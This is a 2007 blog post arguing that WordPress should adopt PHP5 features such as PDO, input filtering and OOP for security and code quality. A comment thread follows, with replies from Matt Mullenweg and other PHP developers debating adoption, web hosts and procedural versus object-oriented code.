What Matt Mullenweg doesn’t know about PHP5, and how it hurts him and his users

Matt Mullenweg, the dude behind Wordpress, has posted something of a rant about PHP5 in the light of the upcoming drop of PHP4 support:

None of the most requested features for WordPress would be any easier (or harder) if they were written for PHP 4 or 5 or Python. They’d just be different. The hard part usually has little to do with the underlying server-side language.

Here’s a hint: don’t give the users what they say they want until you give them what they need. — even if they don’t realize what that is. Here’s some PHP5-only features that could be helping Wordpress users right now:

  • Parameterized SQL input to eliminate SQL injection attacks (security)
    Strictly enforcing the use of parameterized SQL input in Wordpress development would dramatically reduce, and in all likelyhood eliminate, the possibility of SQL injection attacks against Wordpress. Using the PHP5-only PDO extension would allows this even with databases that don’t natively support this feature.

  • Filter extension to combat XSS, CSRF, etc. attacks (security)
    The PHP5-only filter extension adds fast, built-in input filtering functions. Given the history of problems Wordpress has with handling user input properly, enforcing the use of this or another solid input filtering system would surely reduce the amount of input handling errors in the WP codebase.

  • Turning off remote file inclusion by default (security)
    Remote file inclusion vulnerabilities account for approximately 40% of all security issues with PHP-based applications. The allow_url_include configuration setting, added in PHP 5.2.0, disables remote file inclusion by default.

  • Prepared statement/transaction support in PDO and MySQLi (performance)
    Prepared statements not only provide the benefits of parameterized input mentioned above, but significant performance increases can be had with them. AFAIK, it’s not possible to support these features in MySQL under PHP4.

  • Improved OOP features and support (code quality, extensibility)
    This would aid developers first, which in turn would benefit users, by making (in my opinion and based on anecdotal evidence) a large project like Wordpress easier to maintain. Code reusability is improved, quality is increased, and hackish approaches like global variables become unnecessary.

    I’ve hacked the guts of Wordpress and written numerous plugins, and I’m still shocked at what a garbled mess the WP codebase is, and how much easier it is to write extensions for content management systems that embrace OOP. Of course, OOP is very possible in PHP4, but PHP5 adds a number of features that make a significant difference in team development (public/private/protected properties and methods, for example).

    (A cynic might suggest that one reason to not clean up the WP architecture is because that would break backwards compatibility with the extensive library of plugins that has a lot to do with Wordpress’ success. There would be some irony in that, no?)

I think this line from Matt’s post might be telling:

Even hosted PHP-powered services who have no shared host compatibility concerns like 30boxes, Digg, Flickr, and WordPress.com, have been slow to move and when they do it will probably be because of speed or security, not features.

The thing is, support of PHP5-only features in WP would give it better speed and security right now. And especially in the case of security, Matt’s reliance on what users say they want is a critical error: users don’t ask about security until well after it becomes a serious issue. Wordpress has one of the worst security records of any PHP application, so I’ll go out on a limb and say that it’s a problem now. Even if WP users aren’t talking about it, WP’s core dev team should have addressed this already.

I’ve said before that web app developers are the stewards of their users’ data. Our users need and expect us to anticipate and address their security. If we don’t do that, and simply base our actions on popular opinion, we’re being irresponsible.


On a basically unrelated note, it really is disappointing to see Matt sink to ad-hominem attacks when making his argument:

In 2007, [the PHP site] still doesn’t have obvious permalinks. They do have a RSS 1.0 feed though, remember those?
Some app makers felt sorry for PHP 5 and decided to create the world’s ugliest advocacy site…

That’s bush league, Matt. Cut the elitism BS and stick to a proper, logically sound argument.

  • Joshua May
    http://www.notjosh.com/blog
    07/15/2007 10:59:58 PM

    yeah, I agree. It’s just a cat-fight, though. Not everyone would be happy, and that was obvious, but it’d kind of sad to see someone in that position reacting that way.

    That said, I completely understand where he’s coming from. But I still think it’s much better to embrace progress. Early adoption is key.

    Consider me still not a Wordpress user or advocate.

  • Ronald van den Heetkamp
    http://www.0x000000.com
    07/16/2007 05:21:41 AM

    I don’t agree with your arguments, and it’s almost like you are saying that everyone MUST comply to PHP5 fanboys.

    And if you talk about the security features, you still rely on the PHP5 backend, which hardly anyone inspects for flaws. Ever saw the PHP5 security buglist? it’s almost as large as PHP4 to PHP4.6 combined. More features, more stuff to attack, more unknown and potential holes.

    I praise the effort of PHP5 but I don’t need it, hence I could get away free with using php3 if I wanted and still be secure, cause it still depends on how you handle data as a programmer. No short cuts while relying on the PHP5 backend to solve your problems. It can supplement, but It poses a danger if one trusts upon it blindly.

    And the Apache 1.337 => Apache 2.00 discussion is a wise lesson, newer doesn’t mean more secure, It maybe easier to do stuff than before, but it isn’t “more” secure.

  • Matt
    http://photomatt.net/
    07/16/2007 05:51:59 AM

    Thanks for the thoughtful entry! This is just the kind of thing I was hoping people would post. Just a few notes:

    1. We now have parameterized SQL in core.
    2. We’re not concerned with databases besides MySQL.
    3. We have fine HTML filtering with KSES. The filtering has never been a problem, it’s just places where it’s been not applied.
    4. While it would be nice to get a little more performance by using prepared statements, SQL is generally less than 5% of execution time.
    5. OOP - In our experience strict OO can be fairly intimidating to casual coders, who are the people who have created the countless plugins for WP that make it as popular as it is today and, as you note, we’d like to maintain backward compatibility for. However internal APIs and code has embraced OO methods where appropiate.

    While significant efforts have been made in auditing WP’s code, and we will continue to do so, I’m operating under the assumption that someday someone will find something, so our focus is on notification and ease of upgrading. Since people are using WP as a platform we need to make it upgrade like one.

  • Patrick Lee
    http://www.alimadzi.com
    07/16/2007 10:11:05 PM

    I’m on the fence with this one. While I love all the advantages that PHP 5.2 has over PHP 4.4, I can understand Matt’s argument about the legions of plugin developers who don’t grok OOP. However, Josh has some great points about enforcing security by default using PDO, Filter, and other features only available in PHP 5+.

    The great thing about open source software is that people who are not happy with the status quo have the freedom to fork the project and go their own way. There’s nothing to stop somebody from creating “wOOrdpress”. Get it? OO?

    Would this be a good thing for the Wordpress community as a whole? Hard to say, but my guess is probably not. Will the whole GoPHP5 movement really result in a mass upgrade? I hope so, but I don’t know that either. I just know that Wordpress is arguably the most popular and most extensible PHP app in existence today and we should probably think twice before we really rock the boat.

    Does something need to be done to finally squelch the lingering code issues that WP has? Absolutely. Is a complete rewrite using PHP5-only features the answer we’re looking for? Magic 8 Ball says… “Ask again later.”

  • Patrick Lee
    http://www.alimadzi.com
    07/16/2007 10:12:08 PM

    Sorry, where I said Josh in the first paragraph, I should have said Ed. Oops.

  • Nate Klaiber
    http://nateklaiber.com
    07/17/2007 09:25:49 AM

    Just as there are developers who don’t <em>get</em> PHP5 and its OO features, there are other developers who don’t want to traverse through a procedural mess. I am one of those people. Sure, I would love to extend a few things about my WP installation, but the codebase beneath is simply functions strung together, PHP/HTML intermixed at many different levels.

    So because there are hack developers who know little PHP and can work with the procedural mess, that is what keeps you from moving to a cleaner OO system?

    I hope as someone else pointed out, that someone will extend it to be OO. For now, I have found the best option is to simply move away from WordPress as it can’t do the things I need my site to do (without me hacking the procedural mess, no thanks). This doesn’t make Wordpress bad, I am just on the other side of the fence in that I prefer clean code and standards within.

    I think the real issue is that people try to stretch Wordpress into something it isn’t. Again, nothing against WP - it is a great blogging system. Some people try and make it do things it simply wasn’t created for.

    Then again, maybe I should upgrade and check out the recent changes that Matt listed above before I speak any more.

  • Sean
    07/17/2007 07:52:04 PM

    Like you, I’ve spend a lot of time digging through the core WordPress code, and it is an ungodly, unmanageable mess.

    I can only roll my eyes when I read Matt’s “expert” opinions on PHP.

  • Matt
    http://photomatt.net/
    07/17/2007 08:01:40 PM

    Then write a better app, and make it popular.

  • Jacob Santos
    07/17/2007 10:30:37 PM

    Um, procedural code isn’t a bad thing. The WordPress code is very easy to extend and that in my opinion is worth more than anything. I believe more applications should duplicate the plugin (hook, action, event) model of WordPress.

    Unless you work with WordPress and other OO applications, you can’t really appreciate the ease. Also, reading WordPress code is a lot cleaner than some other applications.

    Sometime, look at the horror that is Coppermine and you’ll be impress by that of WordPress. However, the Gallery 2 code is solid.

    I actually started an OO fork of WordPress Yesterday, but I’m not sure how far I’ll get with it. Probably abandon it after a couple of weeks, after I realize it is a waste of time and WordPress code is good enough Procedural.

  • funkatron
    http://funkatron.com
    07/17/2007 11:28:26 PM

    @Ronald van den Heetkamp: I am not implying anything I did not say.

    @sean: I think Matt’s a smart guy, and his opinions are as valid as any. I happen to disagree with him in this case.

    @Matt: Popularity has many potential fathers, and quality is all too infrequently one of them.

  • Thomas Lee
    http://www.vector-seven.com
    07/17/2007 11:30:14 PM

    On the topic of parameterized queries and prepared statements with PDO, you might want to check out the successor to PEAR DB - MDB2:

    http://pear.php.net/MDB2

    You’ll likely want to load the “Extended” module too:

    $db =& MDB2::connect($dsn); $db->setFetchMode(MDB2_FETCHMODE_ASSOC); $db->loadModule(“Extended”, NULL, FALSE);

    MDB2 works in PHP4 too if you’re feeling sinful. :)

  • funkatron
    http://funkatron.com
    07/17/2007 11:34:12 PM

    @Thomas: Thanks for the info!

  • Sean
    07/18/2007 12:05:34 AM

    @funkatron - WordPress wouldn’t dominate the blogging software “market” if Matt wasn’t a smart guy. We all know he’s smart.

    Another intelligent man who used his smarts to dominate a market is Bill Gates. However Bill’s poor coding skills are legendary. The success of Windows is a testament to his marketing skills, not his coding abilities.

    The same holds true for Matt. The WordPress code is proof enough that he’s not the greatest programmer. It breaks dozens of fundamental coding practices — Poor abstraction, reusability, no inline documentation, etc. If you don’t even understand and use the fundamentals of programming, how can you say with authority that PHP4 is just fine, and PHP5 has nothing to offer?

    So yes, he’s a smart guy. He’s been a great marketer. But he’s no programmer, which is why I couldn’t care less what he has to say on the subject.

  • Alex
    http://alexking.org
    07/18/2007 03:08:40 AM

    I think there’s a fundamental point being missed here. I’ve watched Matt work for several years and argued against him on numerous points during that time. While I don’t always agree with him or his arguments, like most smart people Matt is willing to be convinced by good arguments on the other side.

    The real issue that I see is that for many PHP5 is still lacking a “OMG I have to upgrade right now because I want that” feature. That will drive upgrades much more than an pro PHP5 campaigns, etc.

    You may not agree with Matt’s opinions on this topic, but I can’t imagine it’s the first time you’ve heard them. Think about that for a little bit. Certainly we can all agree that compelling features make for quicker adoption of upgrades.

  • Sean
    07/18/2007 03:49:41 AM

    @Alex - I think this is where we start getting into a cylindrical stale-mate. Web hosts aren’t looking for “OMG” features. They’re only looking for demand to upgrade.

    There’s no demand on web hosts to upgrade when insanely huge, popular applications like WP still work with dusty ol’ PHP 4.3.

    Matt isn’t going to push forward, partially because web hosts still support 4.3, so there’s no demand for him to leave PHP4 behind.

    And around and around we go. Web hosts and application developers are both staring at each other, waiting for the other one to make the first move.

    So what’s the other reason Matt won’t leave PHP4 behind? It’s possibly because he doesn’t think PHP5 has any “OMG” features, and that’s what funkatron’s post is all about.

    He’s trying to point out that PHP5 has some serious OMG features that could benefit WP in so many ways. But Matt either doesn’t understand, or doesn’t care.

    All the code Matt creates (or code written by others that he manages) is written in PHP4 (that I know of), so I have to wonder if he’s even tried using PHP5 in a serious real world way. You can’t say you don’t like something, or say you don’t see the value of it until you’ve tried it, right?

  • funkatron
    http://funkatron.com
    07/18/2007 11:49:10 AM

    @alex: “Certainly we can all agree that compelling features make for quicker adoption of upgrades.”

    True, yes, but… let’s look at something matt said in his post:

    “What was it that made PHP 4 so successful? What are we doing to emphasize those strengths? Why wasn’t PHP 5 compelling to that same audience? “

    I think a lot of what made PHP4 so successful was simply timing, good integration with Apache, and a shallow learning curve. All of these things are also present in PHP3. A couple features in PHP4 aided things a bit, like native sessions (although pure PHP solutions existed, which Matt seems to prefer), but I don’t think it’s the case that particular PHP4-only features dramatically increased adoption. PHP4 had a fully rewritten engine, but feature-wise 4 was very much an evolutionary change, just like PHP5 and just like PHP6 seems to be. Things that have been present in all PHP versions since 3 were, imho, what led to PHP’s dominance.

    The difference between the jump from 3 to 4 and 4 to 5 is that PHP has a far, far larger audience to deal with, and a MUCH larger group of applications which may have bc issues (although I think those are fairly minor in most cases). I suspect that is why adoption of PHP5 is slower, and not because of anything inherent to PHP4 that’s not there in PHP5.

  • Michal Migurski
    http://mike.teczno.com
    07/19/2007 12:09:27 PM

    Use or non-use of OOP is unrelated to the garbled mess inside WP (it makes me shudder, too). If anything, bad OOP is significantly harder to follow than bad functional/procedural code, because it adds a full extra dimension of inheritance to the what-the-heck-is-this-program-doing search space.

    The other arguments offered in this post boil down saving users from themselves: if we could just force everyone to move to a language version that limited their actions in some crucial way (enforced prepared statements, input filtering), there would be no security problems. Aside from being unrealistic, you deny the ease of use and approach that made PHP4 and WordPress catch on as strongly as they did. This is Matt’s core point: messiness supports and allows popularity.

  • Jeff Eaton
    http://jeff.viapositiva.net
    07/19/2007 01:46:28 PM

    <blockquote>And around and around we go. Web hosts and application developers are both staring at each other, waiting for the other one to make the first move.</blockquote> …And that’s precisely the reason a number of OSS projects formed the GoPHP5 group. To collectively take the first step and get the ball rolling with hosting, application, and other upgrades. It’s baffled me that some people talk about that move as a ‘political move,’ or ‘playing power games with users,’ and so on. It’s all about breaking the stalemate that locks apps out of useful new work that the PHP development team is producing.

    On a completely unrelated site note, Ed, I was very amused to see your name pop up in my news. I was a big Cult of Jester fan back in the day. ;)

  • funkatron
    http://funkatron.com
    07/19/2007 01:46:41 PM

    @michal

    Agreed, badly organized code is a challenge to follow, no matter if it’s procedural or no. I do tend to find OOP easier to grok out of the box, but that may just be me.

    I think you mis-characterize my post, though. I’m pointing out features that PHP5 provides which would, I believe, improve Wordpress. When I do talk about enforcement of certain coding styles, those are things that would be done on a project level. The context is the Wordpress project, not all PHP development.

    I’d have to see a much more fleshed-out argument that “messiness” supports and allows popularity on a per-project level. I do think that PHP’s popularity owes a lot, not so much to being messy, but to being accessible (maybe we mean the same thing, though). However, I don’t think the feature set changes between 3 and 4 were any more significant than from 4 and 5, and I don’t believe they contributed significantly to PHP’s rise in popularity. I’d certainly like to head arguments to the contrary, though.

  • funkatron
    http://funkatron.com
    07/19/2007 02:07:39 PM

    @Jeff: rock on! I’m still doing music, and you can buy the old COJ stuff online and directly from me.

    Check out http://cultofjester.com

  • 0x000000
    http://www.0x000000.com
    07/19/2007 03:33:40 PM

    @funkatron

    I sure applaud the new features, but I also say it isn’t smart to rely on it solely. I rather would see a very stripped version of PHP, cleaned from all those functions, which all do more or less the same.

    I started OO scripting in 2004 and in the end I dropped it because it didn’t save me any time, and it did not made my apps run any better. No one has ever convinced me of the benefits after that because I still think it’s a useless concept.

    For what it’s worth; My scripting mantra is simple, I don’t make it anymore complex than it already is.

  • jharr
    07/19/2007 04:19:28 PM

    If PHP5 were so compelling people would be using it. If it’s ‘features’ need this much effort to expose/build-up/market then something is really missing, regardless of how valuable it may truly be to developers. Just because an initiative is open-source vs commercial doesn’t mean it won’t suffer the same pitfalls, marketing woes and customer push-back.

    I find humor in the fact that you dismiss Matt as an elitist in your post then go on to support the opinion that PHP4’s popularity and appeal to less sophisticated developers make it a mess and play up the OOP snobbery. Glass houses and whatnot.

  • Nate Klaiber
    http://www.nateklaiber.com
    07/19/2007 04:33:20 PM

    @jharr OOP snobbery? That has to be one of the funniest things I have heard all day long.

  • funkatron
    http://funkatron.com
    07/19/2007 04:55:57 PM

    @jharr:”If PHP5 were so compelling people would be using it.”

    I think you’re oversimplifying the issue and underestimating the challenge of dealing with an enormous user base in an open-source project. Indeed, I’m not even trying to argue that everyone should be using PHP5 — I do, and I enjoy many of its features, but anyone can feel free to continue to use PHP4 if they wish. I simply was addressing the idea that PHP5 had little to offer Wordpress — I don’t feel that’s true, and made a post about that. You’re inferring things that aren’t there.

    “I find humor in the fact that you dismiss Matt as an elitist in your post…”

    I did no such thing. If I were to dismiss him, I wouldn’t have addressed his points in detail. I did, however, point out that he could make his argument without ad-hominem attacks. Matt’s an intelligent guy, and he doesn’t need to do that.

  • funkatron
    http://funkatron.com
    07/19/2007 05:03:50 PM

    @0x000000: OOP is certainly no magic bullet, and the gain (or loss) of productivity will likely vary dramatically from coder to coder, and from project to project. I do think that OOP has the potential to help a lot in larger projects with several developers.

  • Sean
    07/19/2007 11:01:11 PM

    I’m really enjoying this thread, but I hope it doesn’t turn into a OOP vs. Procedure war. That’s been raging on the net for a decade or more, and it’s pointless to start it up here.

    <blockquote> If PHP5 were so compelling people would be using it. </blockquote>

    Lots of PHP developers would love to use PHP5 exclusively. I talk to them all the time. And many that do start using PHP5 never want to go back to PHP4.

    But they can’t use PHP5 because it’s still not wildly supported among web hosts. If you want wide adoption of your application, you need to write it for PHP4, because many web hosts still aren’t using PHP5 yet.

    The features are there, and developers do want to use them. I disagree fully with your point, and agree with funkatron by saying you’re oversimplifying the issue.

    On a side note, I’d use PHP5 for SimpleXML alone.

  • Richard Davey
    http://www.corephp.co.uk
    07/20/2007 12:13:09 PM

    I’m with Sean on this one - the problem for the vast majority of developers out there isn’t that they don’t want to move to PHP5, it is that they cannot because their host doesn’t support it.

    When the PHP developers broke all chance web hosts had of making a painless upgrade from 4 to 5, they broke with it all chance of quick adoption. Sadly I believe ultimately the blame must lay with them and no-one else. It was an internals design decision that caused this mess beyond anything else.

    If they do the same from PHP 5 to 6 then quite frankly most of us can kiss our beloved language goodbye within a very short period of time (which, as a full-time professional PHP developer, scares me greatly).

  • 0x000000
    http://www.0x000000.com
    07/21/2007 08:04:39 AM

    @funkatron

    Yep, in larger projects with multiple programmers OOP is a blessing. That is quite true. But like above stated, a new OOP vs Procedure war is a bit too much and I won’t join it. ^^

    If any, my point was actually that PHP5 doesn’t make it anymore secure persee, it’s not like: I install PHP5 and I’m safe. That is giving developers the wrong example.

    Most PHP scripters think they are safe, I guess it’s a good start by changing attitudes of PHP scripters by convincing them it’s okay to upgrade to PHP5, but it doesn’t mean you back sit back and relax now.

  • Ray
    07/23/2007 02:10:21 AM

    Finally, someone else sees that he’s an elitist, narcissistic prick.

  • funkatron
    http://funkatron.com
    07/23/2007 11:23:06 AM

    @0x000000 I hope no one gets the impression I think PHP5 is somehow a magic security bullet. The context of other posts on this blog and my projects would hopefully indicate otherwise.

  • James Asher
    http://17thdegree.com
    07/25/2007 12:11:14 AM

    Maybe it’s just me, but how is it that webhosts don’t offer php5? I’ve been with Dreamhost for years now and they’ve had a PHP5 offering since 2005.

  • Sean
    07/25/2007 12:45:31 AM

    @James Asher - I agree. It’s possible that in same circumstances it’s a matter of stability, and in others it’s just laziness.

  • Richard Davey
    http://www.corephp.co.uk
    07/25/2007 04:15:00 AM

    And we all know how reliable Dreamhost are ;)

    Sarcasm aside I don’t believe it’s as simple as that. In order to offer both flavours you have to have one of them running as CGI, or split them out across different servers, both of which are quite messy solutions. If you host a number of high traffic PHP 4 sites and then swap them all to the CGI vrsion just so you can get PHP 5 on there, you are going to notice the hit on your servers.

    If you are a decently sized host then you replicate this across thousands of servers, it is no trivial matter.

    If PHP 6 will not work with PHP 5 (which I highly suspect) then web hosts are shit-out of luck - at the moment they can at least juggle 4 and 5 via CGI and Module, but which one gets the elbow when 6 comes along?

  • funkatron
    http://funkatron.com
    07/25/2007 08:39:40 AM

    @Richard

    FWIW, I have generally been happy with Dreamhost, and despite the fact that they’ve had some pretty dramatic issues over the last year, I think that they do a lot comparatively to provide a more secure PHP environment than most large hosts in their cost range.

    I do think that the PHP group would be well-advised to consult a lot more with large web hosting teams on issues like the ones you’ve highlighted.

  • funkatron
    http://funkatron.com
    07/25/2007 08:41:17 AM

    Although I should say that I don’t use DH as my primary hosting anymore.

  • Owen
    http://asymptomatic.net
    07/25/2007 08:46:25 AM

    It comes as no surprise to me that WordPress isn’t interested in these modern coding techniques, after seeing - in only one of many examples - the revision process to the Widget plugin, which is now just a shadow of its formerly entirely OO self. It’s simultaneously ironic that they’re convinced that they’re user-centered in design when the contributing developers (core and plugin) that made the product popular are the users they’re alienating by dragging their feet with their dedication to PHP4. WordPress, for reasons I haven’t been able to understand, has the power to affect positive change, but doesn’t bother.

    For anyone interested in a PHP5-based, object-oriented project - to follow through on matt’s brazen yet tired refrain of “if you think you can do better” - please check out <a href=”http://habariproject.org”>Habari</a> where we’ve got a bunch of developers (including many prior WP contributors) working within a truly open-source contribution model where contributor opinion on the technology used actually factors into the decision-making.